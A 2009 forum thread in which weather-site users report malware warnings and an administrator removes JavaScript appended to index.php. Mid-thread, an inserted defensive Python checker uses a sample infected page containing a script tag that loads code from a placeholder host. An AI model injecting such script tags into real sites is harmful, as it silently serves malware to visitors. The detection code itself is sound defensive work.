Author Topic: !! to all ADMINS !!  (Read 16431 times)


Offline ncpilot

  • Forecaster
  • *****
  • Posts: 937
    • Monkey Junction Weather
!! to all ADMINS !!
« on: March 16, 2009, 08:52:18 AM »
Thought this might be the easiest way to contact you all...

Just now, when going to this forum directly by typing the URL, I'm getting multiple warnings from Trend Micro (work computer) for:

bamrot.com/qqp/index.php

Google even flags it as dangerous...

Never seen this before.

Has the forum site been hacked?
Marc
Wilmington, NC
"Monkey Junction Weather"
Davis VP2 wireless, WeatherLink

Offline Bushman

  • Forecaster
  • *****
  • Posts: 7549
    • Eagle Bay Weather
Re: !! to all ADMINS !!
« Reply #1 on: March 16, 2009, 09:14:59 AM »
I just tried it on a new load of FF and no such warnings.   Running SAV and Win Firewall.  Maybe YOU'VE been hacked?
Need low cost IP monitoring?  http://wirelesstag.net/wta.aspx?link=NisJxz6FhUa4V67/cwCRWA or PM me for 50% off Wirelesstags!!

Offline ncpilot

  • Forecaster
  • *****
  • Posts: 937
    • Monkey Junction Weather
Re: !! to all ADMINS !!
« Reply #2 on: March 16, 2009, 09:33:28 AM »
No other website I load gives that warning...

Try looking that site up in Google...
Marc
Wilmington, NC
"Monkey Junction Weather"
Davis VP2 wireless, WeatherLink

Offline Bushman

  • Forecaster
  • *****
  • Posts: 7549
    • Eagle Bay Weather
Re: !! to all ADMINS !!
« Reply #3 on: March 16, 2009, 09:38:12 AM »
I did.  It uses an ActiveX component.  Have you run a spyware scan on your system?  I don't get any such report accessing this or other sites.
Need low cost IP monitoring?  http://wirelesstag.net/wta.aspx?link=NisJxz6FhUa4V67/cwCRWA or PM me for 50% off Wirelesstags!!

Offline mackbig

  • Forecaster
  • *****
  • Posts: 4128
    • Mackie's Main Street, Unionville, ON Canada Weather
Re: !! to all ADMINS !!
« Reply #4 on: March 16, 2009, 09:59:30 AM »
That site is an apparently known malware site, hence the google warning.

I am confused, I thought when trying to access this forum you got a warning about "bamrot.com/qqp/index.php"

I have not seen any warnings this morning for the forum.  I went to the above site, prior to googling it, nothing loaded, I assume our massive corporate firewall has it on a black list.

Andrew

Andrew - Davis VP2+ 6163, serial weatherlink, wireless anemometer, running Weather Display.  Boltek PCI Stormtracker, Astrogenic Nexstorm, Strikestar - UNI, CWOP CW8618, GrLevel3, (Station 2 OS WMR968, VWS 13.01p09), Windows 7-64

Offline ncpilot

  • Forecaster
  • *****
  • Posts: 937
    • Monkey Junction Weather
Re: !! to all ADMINS !!
« Reply #5 on: March 16, 2009, 10:20:12 AM »
You may have "silent" warnings...

I've got Trend Micro (for better or worse--it's what corporate uses) on my laptop, and every time I refresh or navigate on this forum, a window pops up warning about bamrot...

Just did a scan of my computer, and it's clean...

I'm using an older version of Firefox for a thumbdrive (and yes, I scanned my thumbdrive), so maybe FF 3 blocks the site?

I remoted into my home computer and went to this forum using FF 3, with AVG antivirus running, and I did not get a warning...
Marc
Wilmington, NC
"Monkey Junction Weather"
Davis VP2 wireless, WeatherLink

Offline ncpilot

  • Forecaster
  • *****
  • Posts: 937
    • Monkey Junction Weather
Re: !! to all ADMINS !!
« Reply #6 on: March 16, 2009, 10:30:40 AM »
Warnings have gone away...

I see saratogawx is also online... maybe he fixed something?
Marc
Wilmington, NC
"Monkey Junction Weather"
Davis VP2 wireless, WeatherLink

Offline Anthony

  • Forecaster
  • *****
  • Posts: 1707
    • Anthony's Weather
Re: !! to all ADMINS !!
« Reply #7 on: March 16, 2009, 10:30:45 AM »
I run AVG and win xp pro and have not gotten any warnings either.
Thanks,
Anthony
WB8YUE

Offline NGRRFan

  • Senior Member
  • **
  • Posts: 57
Re: !! to all ADMINS !!
« Reply #8 on: March 16, 2009, 10:41:19 AM »
Kaspersky also says there is a virus at this site.

Offline saratogaWX

  • Administrator
  • Forecaster
  • *****
  • Posts: 9257
  • Saratoga, CA, USA Weather - free PHP scripts
    • Saratoga-Weather.org
Re: !! to all ADMINS !!
« Reply #9 on: March 16, 2009, 10:53:28 AM »
It was a problem.. JavaScript malware code was appended to the index.php on this site.  It's now removed.

We're doing some forensics to see how it arrived on the site.

Thanks for the alert(s) that were sent.

I find that Firefox with NoScript absolutely prevents this kind of thing from penetrating my client .. I get a nice 'script blocked' indicator, then I can check which domain the script is trying to execute to, and it's easy to track down the malware. :)

Best regards,
Ken
Ken True/Saratoga, CA, USA main site: saratoga-weather.org
Davis VP1+ FARS, Blitzortung RED, GRLevel3, WD, WL, VWS, Cumulus, Meteobridge
Free weather PHP scripts/website templates - update notifications on Twitter saratogaWXPHP

Offline sam2004gp

  • Mount Crawford, Virginia
  • Forecaster
  • *****
  • Posts: 2865
  • Weeeeeeeee!!!!
    • Mount Crawford Weather, VA
Re: !! to all ADMINS !!
« Reply #10 on: March 16, 2009, 12:17:28 PM »
Thanks for fixing it guys.  Glad I waited until now to log in.
SAM --->>> http://www.mountcrawfordweather.org
OS WMR-968 with a Dedicated PWS Weather Computer running VWS v13.01 p09


Offline lddaly

  • Forecaster
  • *****
  • Posts: 490
Re: !! to all ADMINS !!
« Reply #11 on: March 16, 2009, 01:38:58 PM »
If we visited the site while it was infected, what actions do we need to take? What are the details of the specific Malware that we can look for?

Offline saratogaWX

  • Administrator
  • Forecaster
  • *****
  • Posts: 9257
  • Saratoga, CA, USA Weather - free PHP scripts
    • Saratoga-Weather.org
Re: !! to all ADMINS !!
« Reply #12 on: March 16, 2009, 01:41:35 PM »
If you have current anti-virus software or were using FF with NoScript, then no action is required.  Otherwise, update your anti-virus and run a system scan to make sure nothing untoward entered your system.

I'm still hunting down the source of the infection.
Ken True/Saratoga, CA, USA main site: saratoga-weather.org
Davis VP1+ FARS, Blitzortung RED, GRLevel3, WD, WL, VWS, Cumulus, Meteobridge
Free weather PHP scripts/website templates - update notifications on Twitter saratogaWXPHP

Offline tweatherman

  • Forecaster
  • *****
  • Posts: 537
Re: !! to all ADMINS !!
« Reply #13 on: March 16, 2009, 03:07:29 PM »
I got several spyware warnings on this site yesterday from Webroot spyware running on my computer. Since have been removed on my end.

Tim

Offline saratogaWX

  • Administrator
  • Forecaster
  • *****
  • Posts: 9257
  • Saratoga, CA, USA Weather - free PHP scripts
    • Saratoga-Weather.org
Re: !! to all ADMINS !!
« Reply #14 on: March 16, 2009, 03:22:06 PM »
I think we've found the source of the problem and plugged it, so with any luck, we won't see a re-infestation.

Please accept our apologies for any inconvenience caused by this malware infestation.

Best regards,
Ken
Ken True/Saratoga, CA, USA main site: saratoga-weather.org
Davis VP1+ FARS, Blitzortung RED, GRLevel3, WD, WL, VWS, Cumulus, Meteobridge
Free weather PHP scripts/website templates - update notifications on Twitter saratogaWXPHP

Offline WeatherBeacon

  • Chief
  • Forecaster
  • *****
  • Posts: 1369
    • http://www.wxbeacon.com
Re: !! to all ADMINS !!
« Reply #15 on: March 16, 2009, 04:53:03 PM »
I think we've found the source of the problem and plugged it, so with any luck, we won't see a re-infestation.

Please accept our apologies for any inconvenience caused by this malware infestation.

Best regards,
Ken

Good work, Ken, and whomever else was involved. Thanks for your diligence and hard work! =D>
Mae govannen!
Kevin  (Member AMS) http://www.wxbeacon.com               Genesee County, Michigan
Hardware:  Davis Vantage Pro Wireless, Midland WR-300
Software: VWS 14.01p43, WeatherFlash, & GRLevel3

Offline racenet

  • Forecaster
  • *****
  • Posts: 1306
    • NH Weather Data
Re: !! to all ADMINS !!
« Reply #16 on: March 16, 2009, 07:15:20 PM »
Maybe not quite wiped out. Just got a warning via AVG. The first one today. Had 3 yesterday.
Bob
www.theamericanflagstore.com - The American Flag Store
www.nhweatherdata.com - NH Weather Data

Offline W3DRM

  • Forecaster
  • *****
  • Posts: 3360
    • Emmett Weather
Re: !! to all ADMINS !!
« Reply #17 on: March 16, 2009, 07:39:53 PM »
Ken,

I also got the warning via AVG about an hour ago when I first logged into WXForum.net. AVG caught it and let me quarantine it. Doesn't look like it did any damage though.

Thanks for the quick work in isolating the problem.
Don - W3DRM - Emmett, Idaho --- Blitzortung ID: 808 --- FlightRadar24 ID: F-KBOI7
Davis Wireless VP2, WD 10.37s150,
StartWatch, VirtualVP, VPLive, Win10 Pro
--- Logitech HD Pro C920 webcam (off-line)
--- RIPE Atlas Probe - 32849

Offline saratogaWX

  • Administrator
  • Forecaster
  • *****
  • Posts: 9257
  • Saratoga, CA, USA Weather - free PHP scripts
    • Saratoga-Weather.org
Re: !! to all ADMINS !!
« Reply #18 on: March 16, 2009, 07:48:10 PM »
Found another opening... getting plugged now. Grrrr.  This miscreant is persistent.

Thanks for keeping your 'shields up' and for your patience while we battle the infestation.

Best regards,
Ken
Ken True/Saratoga, CA, USA main site: saratoga-weather.org
Davis VP1+ FARS, Blitzortung RED, GRLevel3, WD, WL, VWS, Cumulus, Meteobridge
Free weather PHP scripts/website templates - update notifications on Twitter saratogaWXPHP

Offline WeatherBeacon

  • Chief
  • Forecaster
  • *****
  • Posts: 1369
    • http://www.wxbeacon.com
Re: !! to all ADMINS !!
« Reply #19 on: March 16, 2009, 07:51:11 PM »
Ken,

I also got the warning via AVG about an hour ago when I first logged into WXForum.net. AVG caught it and let me quarantine it. Doesn't look like it did any damage though.

Thanks for the quick work in isolating the problem.

Don, what settings do you use? I have AVG, and it isn't catching anything. Makes me wonder if I need to tighten it up.

Thanks!
Mae govannen!
Kevin  (Member AMS) http://www.wxbeacon.com               Genesee County, Michigan
Hardware:  Davis Vantage Pro Wireless, Midland WR-300
Software: VWS 14.01p43, WeatherFlash, & GRLevel3

Offline kray1000

  • Purveyor of wry
  • Forecaster
  • *****
  • Posts: 1336
    • http://www.roanokevalleyweather.com
Re: !! to all ADMINS !!
« Reply #20 on: March 16, 2009, 07:54:52 PM »
I have McAfee and I'm not getting any alerts (even silent ones, I don't think).  What are folks doing to trigger the alerts?

(BTW... I use a bookmark to access the forum.)

Offline saratogaWX

  • Administrator
  • Forecaster
  • *****
  • Posts: 9257
  • Saratoga, CA, USA Weather - free PHP scripts
    • Saratoga-Weather.org
Re: !! to all ADMINS !!
« Reply #21 on: March 16, 2009, 07:55:27 PM »
I also have AVG, but it doesn't activate since the NoScript as part of my Firefox never lets the resulting script execute fully :)

The target site for the script has already been sequestered by the Google Firefox plugin as a 'bad site', and the target site is listed in malwarebytes.com too .. The target site no longer coughs up the 'real payload' (which is a good thing).

Incredibly annoying .. it's like playing 'whack-a-mole' .. exciting, but not always 'final'.
Ken True/Saratoga, CA, USA main site: saratoga-weather.org
Davis VP1+ FARS, Blitzortung RED, GRLevel3, WD, WL, VWS, Cumulus, Meteobridge
Free weather PHP scripts/website templates - update notifications on Twitter saratogaWXPHP
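The two admin posts above describe the incident pattern: a script tag appended to index.php that loads from an external host, recurring until the entry point was closed. The following is an added example (not code from the forum or its admins) of the kind of check a site operator could run to catch a re-infestation early: a known-good hash of the file plus a scan for script or iframe sources on hosts outside an allowlist. The sample PHP, the placeholder host and the allowlist are constructed for the example.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample, not from the forum: a PHP index page before and after a
# <script> tag is appended past the closing ?> tag. The host is a placeholder.
CLEAN_PHP = "<?php\nrequire 'SSI.php';\necho 'hello';\n?>\n"
INFECTED_PHP = CLEAN_PHP + '<script src="http://malicious.example/qqp/index.php"></script>\n'

# Hosts this site legitimately loads scripts from (assumed; adjust per site).
ALLOWED_HOSTS = {"www.google-analytics.com"}

# Matches the src attribute of <script> and <iframe> tags, quoted or not.
SRC_RE = re.compile(r'<(?:script|iframe)\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def untrusted_script_hosts(php_source, allowed_hosts=ALLOWED_HOSTS):
    """Return hosts of script/iframe sources in the page that are not allowlisted.

    The injected code in this incident was appended to index.php, so a payload
    after the final ?> is the typical case, but the whole file is scanned.
    """
    hosts = []
    for src in SRC_RE.findall(php_source):
        # Scheme-relative (//host/x) and bare (host/x) sources need a scheme for urlparse.
        if "://" in src:
            url = src
        elif src.startswith("//"):
            url = "http:" + src
        else:
            url = "http://" + src
        host = urlparse(url).hostname
        if host and host.lower() not in allowed_hosts:
            hosts.append(host.lower())
    return hosts


def check_index(php_source, baseline_hash):
    """Integrity check against a known-good hash plus the content heuristic."""
    findings = []
    if sha256_hex(php_source) != baseline_hash:
        findings.append("content differs from known-good baseline")
    for host in untrusted_script_hosts(php_source):
        findings.append(f"script loaded from untrusted host: {host}")
    return findings


if __name__ == "__main__":
    baseline = sha256_hex(CLEAN_PHP)   # record this while the file is known clean
    print(check_index(CLEAN_PHP, baseline))      # []
    print(check_index(INFECTED_PHP, baseline))
```

Run from cron against the live webroot, the hash mismatch fires on any edit while the host check explains which edits matter, which is the signal an operator wants when an attacker keeps re-adding the same payload.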

Offline WeatherBeacon

  • Chief
  • Forecaster
  • *****
  • Posts: 1369
    • http://www.wxbeacon.com
Re: !! to all ADMINS !!
« Reply #22 on: March 16, 2009, 08:44:11 PM »

I don't mean to sound paranoid or alarmist, but do some of the fonts on the forum seem smaller? For example, the fonts in the menu tabs and some of the links seem smaller today than in the past. I don't believe I did anything to change my screen resolution. Anyone else notice that, or is it my imagination?
Mae govannen!
Kevin  (Member AMS) http://www.wxbeacon.com               Genesee County, Michigan
Hardware:  Davis Vantage Pro Wireless, Midland WR-300
Software: VWS 14.01p43, WeatherFlash, & GRLevel3

Offline kray1000

  • Purveyor of wry
  • Forecaster
  • *****
  • Posts: 1336
    • http://www.roanokevalleyweather.com
Re: !! to all ADMINS !!
« Reply #23 on: March 16, 2009, 08:53:37 PM »
Large fonts are getting more expensive. 

Myself, I can't see a difference.  Everything seems the same.

For some reason, I have this uncontrollable urge to whack a mole.

Offline WeatherBeacon

  • Chief
  • Forecaster
  • *****
  • Posts: 1369
    • http://www.wxbeacon.com
Re: !! to all ADMINS !!
« Reply #24 on: March 16, 2009, 09:02:55 PM »
Large fonts are getting more expensive. 

Myself, I can't see a difference.  Everything seems the same.

For some reason, I have this uncontrollable urge to whack a mole.

He he he!

As I'm still recovering from a 3-week cold or flu or combo thereof, I'm still thinking over "coughs up the 'real payload'." :-& :lol:
Mae govannen!
Kevin  (Member AMS) http://www.wxbeacon.com               Genesee County, Michigan
Hardware:  Davis Vantage Pro Wireless, Midland WR-300
Software: VWS 14.01p43, WeatherFlash, & GRLevel3